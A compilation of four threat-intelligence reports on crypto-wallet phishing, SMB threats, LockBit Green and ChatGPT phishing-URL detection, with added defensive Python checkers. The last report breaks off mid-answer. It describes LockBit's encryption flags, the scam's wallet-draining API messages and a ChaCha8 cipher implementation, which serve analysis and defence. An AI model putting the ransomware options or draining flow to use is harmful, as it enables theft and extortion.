Email crypto phishing scams: stealing from hot and cold crypto wallets
Securelist (Spam and Phishing), Wed, 05 Jul 2023. https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/

As cryptocurrencies grow in popularity and new ways of storing them appear, the arsenal of tools used by malicious actors who are after digital money grows with them. Scammers tailor the complexity of their technology and the care with which they imitate legitimate websites to how well the target is protected and how much they stand to steal if they succeed. This story covers two fundamentally different email attacks on the two most popular ways of storing cryptocurrency: hot and cold wallets.

Hot wallets and attempts at hacking them

A hot wallet is a cryptocurrency wallet with permanent access to the internet. This is essentially any online service that provides cryptocurrency storage, ranging from crypto exchanges to specialized apps.

Hot wallets are a highly popular crypto storage option, which is explained by how easy they are to create (registering with a wallet service is all it takes) and how easy it is to withdraw and convert funds. That popularity and simplicity make them cybercriminals’ main target. For the same reasons, and because they are always online, hot wallets are rarely used to store large amounts. Cybercriminals therefore have little motivation to invest heavily in phishing campaigns against them, so the techniques used in email attacks on hot wallets are hardly ever original or complex. They tend to look rather primitive and are aimed mostly at unsophisticated users.

A typical phishing scam aimed at a hot wallet user works as follows: the attackers send emails purporting to come from a well-known crypto exchange, asking the user to confirm a transaction or re-verify their wallet.

Sample phishing email that targets Coinbase users

After the user clicks the link, they are redirected to a page where they are asked to enter their seed phrase. A seed phrase (recovery phrase) is a sequence of 12 (less commonly 24) words for recovering access to a crypto wallet. This is essentially the main password for the wallet. The seed phrase can be used for gaining or recovering access to the user’s account and making any transactions. The seed phrase cannot be changed or recovered: by misplacing it, the user risks losing access to their wallet for good, and by giving it to scammers, permanently compromising their account.

Seed phrase entry page

If the user enters the seed phrase on a fake web page, scammers get full access to the wallet and the ability to siphon all of the funds to their own addresses.

Fairly simple and devoid of software or social engineering tricks, scams like these typically target non-technical users. A seed phrase entry form usually has a stripped-down look: just an input field and a crypto exchange logo.

Phishing scams that target cold wallets

A cold wallet (cold storage) is a wallet without a permanent connection to the internet: a dedicated device, or even just a private key written on a slip of paper. Hardware wallets are the most common form of cold storage. Because these devices are offline most of the time and cannot be reached remotely, users tend to keep significantly larger sums on them. It would be a mistake, though, to believe that a hardware wallet cannot be compromised without stealing it or at least getting physical access to it: as with hot wallets, scammers use social engineering to get at users’ funds. We recently spotted an email campaign aimed specifically at the owners of hardware cold wallets.

This type of attack starts as a crypto email campaign: the user receives an email purporting to come from Ripple, offering a chance to join a giveaway of XRP tokens, the platform’s native cryptocurrency.

Phishing email pretending to be from the Ripple cryptocurrency exchange

If the user clicks the link, they are presented with a blog page featuring a post that explains the rules of the “giveaway”. The post contains a direct link to “registration”.

Fake Ripple blog

Already at this point, the scam differs from mass attacks on hot wallets: instead of sending the user straight to a phishing page, the scammers used a more sophisticated immersion trick with a blog post. They also went as far as meticulously copying the design of the Ripple website and registering a domain name nearly identical to the official one. This is an IDN homograph attack, with the lookalike name registered in its Punycode (xn--) form. At first glance the second-level domain is identical to the original, but a closer look reveals that the letter “r” has been replaced with “ŗ”, Latin small letter r with cedilla (U+0157):

https://app[.]xn--ipple-4bb[.]net -> https://app[.]ŗipple[.]net/

The scam site is also registered under the .net top-level domain rather than .com, where the official Ripple website lives. That alone may not raise red flags with the victim, since both TLDs are widely used by legitimate organizations.
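To make that check mechanical, here is an added example in Python (not code from the report or from Ripple) that decodes an xn-- label with the standard library’s punycode codec and then compares a “skeleton” of each label, with accents and combining marks stripped, against an allowlist of brand names. The brand list and the small map of Cyrillic look-alikes are assumptions for the demo; a production check would use the full Unicode confusables table.

```python
import unicodedata

# Constructed allowlist of brand labels a defender cares about (assumption,
# not part of the original article).
BRANDS = {"ripple", "coinbase", "trezor", "ledger"}

# Constructed and deliberately partial map of Cyrillic look-alikes to Latin.
# NFKD handles accented Latin letters such as the cedilla case on its own.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o",
    "\u0440": "p", "\u0441": "c", "\u0445": "x",
}


def decode_host(host: str) -> str:
    """Convert every Punycode (xn--) label of a hostname back to Unicode."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            # The punycode codec implements RFC 3492; the xn-- prefix is stripped first.
            label = label[4:].encode("ascii").decode("punycode")
        labels.append(label)
    return ".".join(labels)


def skeleton(label: str) -> str:
    """Collapse a label to the ASCII it looks like.

    NFKD splits 'ŗ' into 'r' plus a combining cedilla; dropping the combining
    marks (category Mn) leaves the base letter, so 'ŗipple' becomes 'ripple'.
    """
    decomposed = unicodedata.normalize("NFKD", label)
    folded = "".join(CONFUSABLES.get(ch, ch) for ch in decomposed)
    return "".join(ch for ch in folded if unicodedata.category(ch) != "Mn")


def find_homograph(host: str, brands=BRANDS):
    """Return (decoded_host, impersonated_brand); the brand is None if clean.

    A label is flagged when it is not literally a known brand but its
    skeleton is, i.e. it merely reads like the brand.
    """
    decoded = decode_host(host)
    for label in decoded.split("."):
        if label in brands:
            continue
        if skeleton(label) in brands:
            return decoded, skeleton(label)
    return decoded, None


if __name__ == "__main__":
    for host in ("app.xn--ipple-4bb.net", "app.ripple.com"):
        print(host, "->", find_homograph(host))
```

The same decode is what the Trezor Connect consent screen shows the user later in this story: if a domain you think of as ripple.com appears as an xn-- string, that is the cue to stop.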

After the user follows the link from the “blog” to the fake Ripple page, the page offers to connect to the WebSocket address wss://s2.ripple.com. That address is a genuine public XRP Ledger endpoint, which lends the page credibility.

Connection to the WebSocket address

Next, the user is asked to enter the address of their XRP account.

Entering XRP account address

The website then offers to choose an authentication method for receiving the bonus tokens.

Choosing an authentication method

Hardware wallets sit at the top of the list, and that is what the scammers push. Selecting Trezor redirects the user to the official trezor.io site, which lets web apps talk to the device through the Trezor Connect API. The API exists to simplify transactions made with a hardware wallet; the scammers want the victim to connect the device to their site so that it can be asked to sign a transaction that moves the funds out of the victim’s account.

When the user tries to connect to the third-party site, Trezor Connect asks for consent to anonymous data collection and for confirmation that they want to connect to the site. The scam site’s address is displayed in its Punycode form, https://app[.]xn--ipple-4bb[.]net, which is exactly the cue to look for. The scammers count on the user overlooking the address, which is printed in small type at the side of the page.

Trezor Connect: confirming the connection to the scam site

Connecting a Ledger works much like Trezor, except that the browser reaches the device over the WebHID interface; the other steps are unchanged.

What happens after the user connects their hardware wallet? We had to explore the code of the phishing site just a bit to answer that question. The website is powered by an application written in Node.js. This uses two APIs:

  • wss://s2.ripple.com, the official WebSocket address for Ripple transactions
  • The phishing site API, for example: app[.]xn--ipple-4bb[.]net/api/v1/action

The scammers use these two APIs for interacting with the victim’s XRP account. The phishing site API talks to the WebSocket address, verifies account details and requests funds. For this purpose, the scammers spin up one-off intermediate wallets.

Withdrawal request, sent by the page to the phishing site’s own API:

{
  "command": "get_payment",
  "account": victim_address,
  "transactionType": "Payment"
}

Response: an unsigned XRP Ledger Payment transaction, which the connected wallet is then asked to sign:

{
  "success": true,
  "data": {
    "TransactionType": "Payment",
    "Account": victim_address,
    "Fee": "10",
    "Sequence": 391,
    "Destination": "rU53pnJzEv2mrtck…"*,
    "Flags": 2147483648,
    "Amount": "xxx",
    "LastLedgerSequence": 79548458
  }
}

* The scammers generate a new destination address every time. Fee and Amount are expressed in drops (1 XRP = 1,000,000 drops), and Flags 2147483648 is 0x80000000, the standard tfFullyCanonicalSig flag.

The intermediate account is used for just two things: to receive the victim’s funds and to forward these to the scammers’ permanent account. This helps to hide the final destination.
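What the hardware wallet is ultimately asked to sign is the “data” object above, and the device will show its Destination and Amount. As an added example (not the scammers’ code and not from the report), the Python below reviews such an unsigned XRP Ledger Payment before it is signed: it flags a Destination outside the user’s own allowlist, an Amount that empties the account, an oversized Fee, and any flag other than tfFullyCanonicalSig (0x80000000, the 2147483648 shown above). The addresses, the balance and the 10 XRP base reserve are constructed or assumed values for the demo.

```python
# Units and thresholds (constructed for the demo): the XRP Ledger counts
# amounts and fees in drops, and an account must keep a base reserve that
# cannot be spent. The 10 XRP reserve is an assumption for this example.
DROPS_PER_XRP = 1_000_000
BASE_RESERVE_DROPS = 10 * DROPS_PER_XRP
TF_FULLY_CANONICAL_SIG = 0x80000000  # 2147483648, the Flags value in the response above


def review_payment(tx: dict, known_destinations: set, balance_drops: int) -> list:
    """Return warnings for an unsigned XRP Ledger Payment before it is signed.

    tx                  the "data" object a site asks the wallet to sign
    known_destinations  the user's own allowlist of destination addresses
    balance_drops       the account balance, in drops
    """
    warnings = []
    if tx.get("TransactionType") != "Payment":
        warnings.append(f"unexpected TransactionType {tx.get('TransactionType')!r}")
        return warnings

    dest = tx.get("Destination", "")
    if dest not in known_destinations:
        warnings.append(f"destination {dest} is not an address you know; a giveaway never needs you to pay it")

    raw_amount = tx.get("Amount", "0")
    if isinstance(raw_amount, str):
        amount = int(raw_amount)
    else:
        # Issued currencies arrive as an object {currency, issuer, value}; not expected here.
        warnings.append("Amount is not in XRP drops; review manually")
        amount = 0
    spendable = max(balance_drops - BASE_RESERVE_DROPS, 0)
    if spendable and amount >= 0.9 * spendable:
        warnings.append(
            f"amount {amount / DROPS_PER_XRP:.6f} XRP empties the account "
            f"(spendable {spendable / DROPS_PER_XRP:.6f} XRP)"
        )

    fee = int(tx.get("Fee", "0"))
    if fee > DROPS_PER_XRP:
        warnings.append(f"fee {fee} drops is far above the usual 10-12 drops")

    extra_flags = int(tx.get("Flags", 0)) & ~TF_FULLY_CANONICAL_SIG
    if extra_flags:
        warnings.append(f"unexpected flags 0x{extra_flags:08x}")
    return warnings


# Constructed stand-ins for the page's response. The real campaign rotates the
# Destination per victim, so a blocklist is useless; every address here is made up.
MY_ADDRESSES = {"rMyOwnExchangeDepositConstructed"}
SCAM_TX = {
    "TransactionType": "Payment",
    "Account": "rVictimAccountConstructed",
    "Fee": "10",
    "Sequence": 391,
    "Destination": "rScamIntermediateConstructed",
    "Flags": 2147483648,
    "Amount": "989000000",  # 989 XRP, i.e. everything above the reserve
    "LastLedgerSequence": 79548458,
}
OK_TX = dict(SCAM_TX, Destination="rMyOwnExchangeDepositConstructed", Amount="5000000")

if __name__ == "__main__":
    for w in review_payment(SCAM_TX, MY_ADDRESSES, 1000 * DROPS_PER_XRP):
        print("WARNING:", w)
```

Because the intermediate address changes for every victim, the allowlist approach (only pay destinations you already know) is the check that survives; a blocklist of scam addresses would always be one victim behind.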

Statistics

In the spring of 2023, Kaspersky antispam solutions detected and blocked 85,362 scam emails targeting cryptocurrency users. Scam email campaigns peaked in March, with 34,644 messages. We blocked 19,902 emails in April and 30,816 in May.

Number of detected phishing emails targeting cryptocurrency users in March–May 2023

Conclusion

Scammers understand one thing just fine: the harder it is to get to the loot, the bigger it is likely to be. Attacks on hardware wallets, which many consider bullet-proof, therefore use far more sophisticated tactics than those employed against users of online crypto storage services. Although hardware wallets are indeed more secure than hot wallets, users should not lower their guard. Check every detail carefully before giving any website access to your wallet, and when the device asks you to confirm a transaction, verify the destination and amount on its own screen, which the website cannot alter. Refuse to connect if anything smells fishy.

How cybercrime is impacting SMBs in 2023
Securelist, Tue, 27 Jun 2023. https://securelist.com/smb-threat-report-2023/110097/

According to the United Nations, small and medium-sized businesses (SMBs) constitute 90 percent of all companies and provide 60 to 70 percent of all jobs in the world. They generate 50 percent of global gross domestic product and form the backbone of most countries’ economies. Hit hardest by the COVID-19 pandemic, geopolitical upheaval and climate change, they play a critical role in a country’s recovery and need greater support from governments to stay afloat.

In the past, the perception was that large corporations were the more attractive targets for cybercriminals. In reality, cybercriminals target anyone, and especially those who are less protected: small businesses typically have smaller budgets and are less well protected than larger companies.

According to a report by the cybersecurity company Barracuda, in 2021 businesses with fewer than 100 employees experienced far more social engineering attacks than larger ones. That same year saw one of the worst ransomware incidents in history, the Kaseya VSA supply-chain attack. By exploiting a vulnerability in the software, the REvil gang infiltrated between 1,500 and 2,000 businesses around the world, many of them SMBs. For example, the attack hit the small managed service provider Progressive Computing and, through the domino effect, the company’s 80 clients, which were mainly small businesses. Although the attack was contained fairly quickly, the SMB sector was understandably shaken, as it alerted businesses to the fact that everyone was vulnerable.

According to the Kaspersky cyber-resilience report, in 2022 four in ten employers admitted that a cybersecurity incident would be a major crisis for their business, exceeded only by a slump in sales or a natural disaster. Judging by the survey results, a cybersecurity crisis would also be the second most difficult type of crisis to deal with, after a dramatic drop in sales.

In this report, we have analyzed the key threats to small and medium-sized companies in 2022 and 2023, and provided advice on how to stay safe.

Methodology

The statistics used in this report were collected from January through May 2023 by Kaspersky Security Network (KSN), a system for processing anonymized cyberthreat-related data shared voluntarily by Kaspersky users.

To assess the threat landscape for the SMB sector, Kaspersky experts collected the names of the most popular software products used by its clients that are small or medium-sized businesses around the world. The final list includes MS Office, MS Teams, Skype and other software used by the SMB sector. We then ran these software names against KSN telemetry to find out how much malware and unwanted software was distributed under the guise of these applications.

Malware attacks

Between January 1 and May 18, 2023, 2,392 SMB employees encountered malware or unwanted software disguised as business applications, with 2,478 unique files distributed this way. The total number of detections of these files was 764,015.

Below is a brief description of the most popular types of threats that SMB employees encountered in January–May 2023:

Exploits

The biggest threat to SMBs in the first five months of 2023 was exploits, which accounted for 483,980 detections. Malicious and/or unwanted software often gets onto the victim’s computer through exploits: code written to take advantage of vulnerabilities in software. An exploit can run other malware on the system, elevate the attackers’ privileges, crash the target application and so on, and it often needs no action from the user at all.

Trojans

The second-biggest threat was Trojans. Named after the mythical horse that helped the Greeks infiltrate and defeat Troy, this type of threat is the best known of them all. It enters the system in disguise and then starts its malicious activity. Depending on its purpose, a Trojan can perform various actions, such as deleting, blocking, modifying or copying data, disrupting the performance of a computer or computer network, and so on.

Backdoors

The third most common threat is backdoors. These are among the most dangerous types of malware because, once they penetrate the victim’s device, they give the cybercriminals remote control. They can install, launch and run programs without the consent or knowledge of the user. Once installed, backdoors can be instructed to send, receive, execute and delete files, harvest confidential data from the computer, log activity, and more.

Not-a-virus

Potentially unwanted applications (PUAs) that can be inadvertently installed on your device are labeled “not-a-virus” by our solutions. Although they are listed among the most widespread threats and can be used by cybercriminals to cause harm, they are not malicious per se. Nonetheless, their behavior is annoying, sometimes even dangerous, and the antivirus alerts users because, despite being legal, they often sneak onto the device without the user realizing.

TOP 10 threats for SMBs, January–May 2022

TOP 10 threats for SMBs, January–May 2023

Cybercriminals attempt to deliver this and other malware and unwanted software to employees’ devices by using any means necessary, such as vulnerability exploitation, phishing e-mails and fake text messages. Even something totally unrelated to business, such as a YouTube link, may be used to target SMBs, as their employees often use the same devices for work and personal matters.

One of the methods often used to compromise employees’ smartphones is “smishing” (a blend of SMS and phishing). The victim receives a link via SMS, WhatsApp, Facebook Messenger, WeChat or some other messaging app. If the user taps the link, malicious code is downloaded onto the device.

Examples of scam threats and phishing

Phishing and scams pose a significant threat to SMBs, as scammers mimic payment, loan and other services, as well as cloud service providers like Microsoft, in order to obtain confidential information or company funds. The phishing pages that employees land on after clicking a link in a scam e-mail are often tailored to look like the login pages of the targeted systems, complete with the corresponding logo. Below are several examples of phishing pages that imitate various services in an attempt to get hold of the target company’s data and money.

  • An insurance company

    Scammers trying to hack the work account of an insurance company employee

    In the screenshot above, the scammers are phishing for the account that an employee of a client company uses with the insurer.

  • A “personal” banking service

    These scammers disguise themselves as a financial institution. On the phishing page that claims to offer personal banking services, they ask users to log in with their corporate banking account credentials. If an employee enters their credentials, the scammers get access to their account.

  • A fake website pretending to be a legitimate delivery service

    Here, the cybercriminals imitate the website of a well-known delivery provider in order to trick businesses into handing over the credentials for their corporate DHL accounts.

Scammers often reach employees by e-mail. Attackers use social engineering techniques to try to trick employees into following a phishing link, revealing the company’s confidential data or transferring money.

For example, in late 2022, scammers posing as top-level executives of a company sent e-mails to its employees instructing them to move money from a business account into another account urgently. The fake e-mails were carefully crafted so that the employees would not question their authenticity.

Some spammers pretend to be representatives of financial organizations offering attractive deals to startups. By applying for the funding on offer, however, an employee may give away sensitive data or even lose company money.

SMB employees and especially managers are often the target of spam campaigns touting collaborations and B2B services, such as SEO, advertising, recruitment assistance and lending. Small and little-known firms with questionable service quality typically promote themselves that way. Often they send their offer repeatedly, even if they never receive an answer.

Qbot Trojan using a conversation hijacking technique

Recently, Kaspersky researchers discovered a new campaign employing the “conversation hijacking” technique. The attackers gained access to the victim’s e-mail and replied to existing conversations. Posing as one of the participants in the e-mail chain, the fraudsters sent a message with a PDF attachment and asked the victim to open it. The PDF contained a fake Microsoft Office 365 or Microsoft Azure notification that delivered the Qbot Trojan. The attackers also sent messages containing a URL that supposedly led to an “important business document”.

Qbot (aka QakBot, QuackBot and Pinkslipbot) has been around since 2007. It is classified as a banking Trojan because it steals its victims’ banking credentials. The malware can also collect cookies from browsers, access correspondence, spy on banking activity and record keystrokes. Finally, it can install other malware, such as ransomware.

Conclusion

As cybercriminals target SMBs with all types of threats — from malware disguised as business software to elaborate phishing and e-mail scams — businesses need to stay on high alert. This is critical, because a single cyberattack can lead to catastrophic financial and reputational losses for a company. To keep your business protected from cyberthreats, we recommend you do as follows:

  • Provide your staff with basic cybersecurity hygiene training. Conduct a simulated phishing attack to ensure that they know how to recognize phishing e-mails.
  • Use a security solution for endpoints, such as Kaspersky Endpoint Security for Business or Cloud-Based Endpoint Security, to minimize the chances of infection.
  • If you are a Microsoft 365 user, remember to protect that too. Kaspersky Security for Microsoft Office 365 includes dedicated apps that target spam and phishing, and protect SharePoint, Teams and OneDrive for secure business communications.
  • Set up a policy to control access to corporate assets, such as e-mail boxes, shared folders and online documents. Keep it up to date and remove access if the employee has left the company or no longer needs the data. Use cloud access security broker software that can help manage and monitor employees’ cloud activity and enforce security policies.
  • Make regular backups of essential data to ensure that corporate information stays safe in an emergency.
  • Provide clear guidelines on the use of external services and resources. Employees should know which tools they should or should not use and why. Any new work software should go through a clearly outlined approval process by IT and other responsible roles.
  • Encourage employees to create strong passwords for all digital services they use and to protect accounts with multi-factor authentication wherever applicable.
  • Use professional services to help you get the most out of your cybersecurity resources. The new Kaspersky Professional Services Packages for SMB provide access to Kaspersky’s expertise on assessment, deployment and configuration: all you need to do is add the package to the contract, and our experts will do the rest.
LockBit Green and phishing that targets organizations
Securelist, Thu, 22 Jun 2023. https://securelist.com/crimeware-report-lockbit-switchsymb/110068/

Introduction

In recent months, we published private reports on a broad range of subjects. We wrote about malware targeting Brazil, about CEO fraud attempts, Andariel, LockBit and others. For this post, we selected three private reports, namely those related to LockBit and phishing campaigns targeting businesses, and prepared excerpts from these. If you have questions or need more information about our crimeware reporting service, contact crimewareintel@kaspersky.com.

Phishing and a kit

Recently we stumbled upon a Business Email Compromise (BEC) case that has been active since at least Q3 2022. The attackers target German-speaking companies in the DACH region. As in many other BEC cases, they register a domain name similar to the attacked organization’s, typically differing in one or two letters. For reasons unknown, the Reply-To field contains a different email address from the From field, and that Reply-To address does not mimic the target organization’s domain.
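Both tells in this case, a sender domain one or two edits away from the target’s own and a Reply-To that points somewhere else entirely, are cheap to check on inbound mail. The Python below is an added example (not from the report) that parses a raw message with the standard library’s email module and reports both indicators; the organisation domain, the addresses and the sample messages are constructed for the demo.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed organisation domain; the report does not name its targets.
ORG_DOMAIN = "example-gmbh.de"


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a BEC lookalike domain is typically 1-2 edits away."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(header_value) -> str:
    """Lower-cased domain part of a From/Reply-To header value ('' if absent)."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()


def bec_indicators(raw_message: str, org_domain: str = ORG_DOMAIN) -> list:
    """Return the BEC indicators a message exhibits, as readable strings."""
    msg = message_from_string(raw_message)
    from_dom = domain_of(msg.get("From"))
    reply_dom = domain_of(msg.get("Reply-To"))
    findings = []
    if from_dom and from_dom != org_domain:
        distance = levenshtein(from_dom, org_domain)
        if 0 < distance <= 2:
            findings.append(f"lookalike sender domain {from_dom} ({distance} edit(s) from {org_domain})")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    return findings


# Constructed samples: the lookalike swaps "m" for "rn", and Reply-To goes to
# a throwaway mailbox, matching the pattern described above.
SAMPLE_BEC = """\
From: CEO <ceo@exarnple-gmbh.de>
Reply-To: ceo.office@webmail-constructed.example
To: accounting@example-gmbh.de
Subject: Dringende Zahlung

Bitte ueberweisen Sie den Betrag noch heute.
"""

SAMPLE_OK = """\
From: CEO <ceo@example-gmbh.de>
To: accounting@example-gmbh.de
Subject: Monatsbericht

Anbei der Bericht.
"""

if __name__ == "__main__":
    for name, raw in (("BEC", SAMPLE_BEC), ("OK", SAMPLE_OK)):
        print(name, bec_indicators(raw))
```

The distance threshold is deliberately small: at three or more edits the false-positive rate on unrelated domains climbs quickly, and the report’s cases differ by only one or two letters.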

In contrast to BEC campaigns that are targeted and require significant effort from the criminals, ordinary phishing campaigns are relatively simple. This creates opportunities for automation, of which the SwitchSymb phishing kit is one example.

At the end of this past January, we observed a spike in phishing email from a campaign targeting business users, which we have monitored closely. The message contained a link to an “email confirmation form”. Anyone who clicked the link landed on a page styled to look like the recipient’s own domain. The phishing kit was designed to serve multiple campaigns at a time from a single instance on the web server. This was easy to demonstrate by modifying the page URL, specifically the reference to the targeted user in it: the layout of the phishing page would change accordingly.

An example of a SwitchSymb-generated phishing page

LockBit Green

LockBit is one of the most prolific ransomware groups currently active, targeting businesses all over the world. Over time, they have adopted code from other ransomware gangs, such as BlackMatter and DarkSide, making it easier for potential affiliates to operate the ransomware.

Since this past February, we have been detecting a new variant, named “LockBit Green”, which borrows code from the now-defunct Conti gang. According to the Kaspersky Threat Attribution Engine (KTAE), LockBit Green incorporates 25% of Conti’s code.

KTAE shows similarities between LockBit Green and Conti

Three pieces of adopted code stand out: the ransom note, the command line options and the encryption scheme. Adopting the ransom note makes the least sense; we could not think of a good reason for doing so, but LockBit did it nevertheless. As for the command line options, the group added Conti’s to those already available in LockBit. All the options available in LockBit Green are:

Flag              Functionality
-p <folder>       Encrypt the selected folder using a single thread
-m local          Encrypt all available drives, one thread per drive
-m net            Encrypt all network shares, one thread per share
-m all            Encrypt all available drives and network shares, multi-threaded
-m backups        Present in the code but not usable in the detected versions
-size <chunk>     Encrypt only part of each file (partial encryption by chunk size)
-log <file.log>   Log every action performed by the ransomware to the given file
-nomutex          Skip mutex creation

Finally, LockBit adopted the encryption scheme from Conti. The group now uses a custom ChaCha8 implementation to encrypt files with a randomly generated key and nonce, which are stored encrypted under a hard-coded RSA public key.
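To make concrete what that scheme means for recovery, here is an added example in pure Python (not Conti’s or LockBit’s code, and not a decryptor for either): a textbook ChaCha with the original 64-bit nonce and 64-bit block counter layout and a rounds parameter, so ChaCha8 is rounds=8 and the implementation can be checked against the published ChaCha20 test vector with rounds=20. The per-file key and nonce come from os.urandom; wrapping them with the hard-coded RSA public key is described in the docstring but not implemented, because that is exactly the step nobody without the attackers’ private key can undo. The malware’s “custom” variant may deviate from the textbook cipher, so an analyst who recovers a key and nonce from memory should expect to adjust this before it decrypts a real sample.

```python
import os
import struct

MASK32 = 0xFFFFFFFF


def _rotl32(v: int, n: int) -> int:
    return ((v << n) | (v >> (32 - n))) & MASK32


def _quarter_round(s: list, a: int, b: int, c: int, d: int) -> None:
    s[a] = (s[a] + s[b]) & MASK32
    s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32
    s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32
    s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32
    s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha_block(key: bytes, nonce: bytes, counter: int, rounds: int = 8) -> bytes:
    """One 64-byte keystream block (256-bit key, 64-bit nonce, 64-bit counter).

    rounds=8 gives ChaCha8, the variant the text describes; rounds=20 gives
    ChaCha20 and lets the code be checked against a known test vector.
    """
    assert len(key) == 32 and len(nonce) == 8 and rounds % 2 == 0
    state = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]  # "expand 32-byte k"
    state += list(struct.unpack("<8I", key))
    state += list(struct.unpack("<2I", struct.pack("<Q", counter)))
    state += list(struct.unpack("<2I", nonce))
    s = state[:]
    for _ in range(rounds // 2):
        # column round
        _quarter_round(s, 0, 4, 8, 12)
        _quarter_round(s, 1, 5, 9, 13)
        _quarter_round(s, 2, 6, 10, 14)
        _quarter_round(s, 3, 7, 11, 15)
        # diagonal round
        _quarter_round(s, 0, 5, 10, 15)
        _quarter_round(s, 1, 6, 11, 12)
        _quarter_round(s, 2, 7, 8, 13)
        _quarter_round(s, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & MASK32 for x, y in zip(s, state)))


def chacha_xor(key: bytes, nonce: bytes, data: bytes, rounds: int = 8) -> bytes:
    """Encrypt or decrypt (XOR is its own inverse), one keystream block per 64 bytes."""
    out = bytearray()
    for offset in range(0, len(data), 64):
        keystream = chacha_block(key, nonce, offset // 64, rounds)
        out.extend(a ^ b for a, b in zip(data[offset:offset + 64], keystream))
    return bytes(out)


def encrypt_file_bytes(plaintext: bytes) -> tuple:
    """The symmetric half of the scheme: a fresh random key and nonce per file.

    In the ransomware the returned (key, nonce) pair is what gets encrypted
    with the hard-coded RSA public key and stored next to the ciphertext,
    so that only the holder of the private key can ever unwrap it.
    """
    key, nonce = os.urandom(32), os.urandom(8)
    return key, nonce, chacha_xor(key, nonce, plaintext)


if __name__ == "__main__":
    key, nonce, ciphertext = encrypt_file_bytes(b"constructed sample document contents")
    assert chacha_xor(key, nonce, ciphertext) == b"constructed sample document contents"
    print("round trip ok; first keystream bytes:", chacha_block(key, nonce, 0)[:8].hex())
```

Dropping from 20 rounds to 8 is a speed choice on the attackers’ side: file encryption is the slow part of a ransomware run, and ChaCha8 is still far beyond anything a defender could brute-force, so the only practical recovery path remains the wrapped key material.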

Binary diffing across the two families

Multi-platform LockBit

We recently stumbled on a ZIP file, uploaded to a multiscanner, that contained LockBit samples for multiple architectures, such as Apple M1, ARM v6, ARM v7, FreeBSD and many others. The next question would obviously be, “What about codebase similarity?”.

For this, we used the KTAE: simply throwing in the downloaded ZIP file was enough to see that all the samples were derived from the LockBit Linux/ESXi version, which we wrote about in an earlier private report.

Source code shared with LockBit Linux

Further analysis of the samples led us to believe that LockBit was still testing its ransomware on various architectures rather than deploying it in the wild. For instance, the macOS sample was unsigned, so it could not be executed as is. The string encryption was also rudimentary: a single-byte XOR.

Nevertheless, our findings suggest that LockBit will target more platforms in the wild in the (near) future.

Conclusion

The world of cybercrime is huge, consisting of many players and gangs whose composition is fluid. Groups adopt other groups’ code, and affiliates, which can be considered cybercrime groups in their own right, switch between different types of malware. Groups keep upgrading their malware, adding features and support for previously unsupported platforms, a trend that has existed for some time now.

When an incident occurs, it is important to find out who has targeted you. This helps to limit the scope of incident response and could help to prevent further damage. The KTAE attributes code to cybercrime groups and highlights features shared by different malware families. This information can also help in taking proactive countermeasures to prevent incidents from happening in the future.

Finally, criminals often resort to old tricks, such as phishing, which, nevertheless, remain highly effective. Being aware of the latest trends can prevent threats like BEC from materializing.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals or have questions about our private reports, contact crimewareintel@kaspersky.com.

What does ChatGPT know about phishing?
Securelist, Mon, 01 May 2023. https://securelist.com/chatgpt-anti-phishing/109590/

Hearing all the buzz about the amazing applications of ChatGPT and other language models, our team could not help but ask this question. We work on applying machine learning technologies to cybersecurity tasks, specifically models that analyze websites to detect threats such as phishing. What if all our complex, multi-layered detection systems are now obsolete, and a single LLM (large language model) to rule them all can fight cybercriminals better than we do?

To answer this question, we conducted an experiment to see how good ChatGPT is at recognizing overtly malicious links. In this article, we provide a practical example of how an LLM can be applied to a real, albeit simplified, cybersecurity task, and describe all the interesting things we learned along the way. Since we didn’t have any illusions that ChatGPT could actually be used as a detection method, our primary goal was to find out how much cybersecurity knowledge ChatGPT has learned from its training data and how it could possibly assist a human analyst in their job.

Why URL classification?

An analyst’s trained eye can spot an obviously malicious link in a split second (and you probably can too):

hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

  • This is not the Office365 login link, is it?

(links in the article are partially masked with x)

A rule of thumb for finding tasks to which ML can be applied is that if a person can do it instantly, almost without thinking, it’s probably a good candidate. Still, building a machine-learning system requires a lot of effort, from gathering data and crafting features to preparing the infrastructure. The promise of replacing all that with a single interface configured via natural language sounds too good to be true, but just how far is it from being a reality?

When conducting this experiment, we were well aware of the limitations of large language models, as well as the fact that OpenAI asks that this emerging technology not be applied to any high-risk area, and states the following about GPT-4’s cybersecurity applications in the model’s system card:

However, GPT-4 has significant limitations for cybersecurity operations due to its “hallucination” tendency and limited context window.

It is natural to assume that GPT-3.5-turbo will exhibit these limitations to a greater extent.

We chose the URL classification task because:

  • Unlike a whole HTML page, a URL fits easily into an LLM, because modern LLMs, such as ChatGPT, can only consume a limited number of symbols (more precisely, tokens) at a time (they have a fixed context window, in LLM-speak).
  • Obviously malicious links are easy to detect, but the task is still non-trivial, because it requires world knowledge (for example, knowing the names of popular web services).
  • URLs are still text, and LLMs are good at processing text.

So here is what we did.

Let’s talk?

First of all, we opened the ChatGPT web interface and checked if what we wanted was even possible:

Judging by the URL, is this link a phishing attempt? Please explain why. Link: hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Yes, it is likely a phishing attempt.

The URL appears to be intentionally deceptive, as it contains several red flags:

  • The domain name “caseld-10xxxx.info” is not associated with any reputable or recognizable entity, and it looks like a random sequence of letters and numbers.
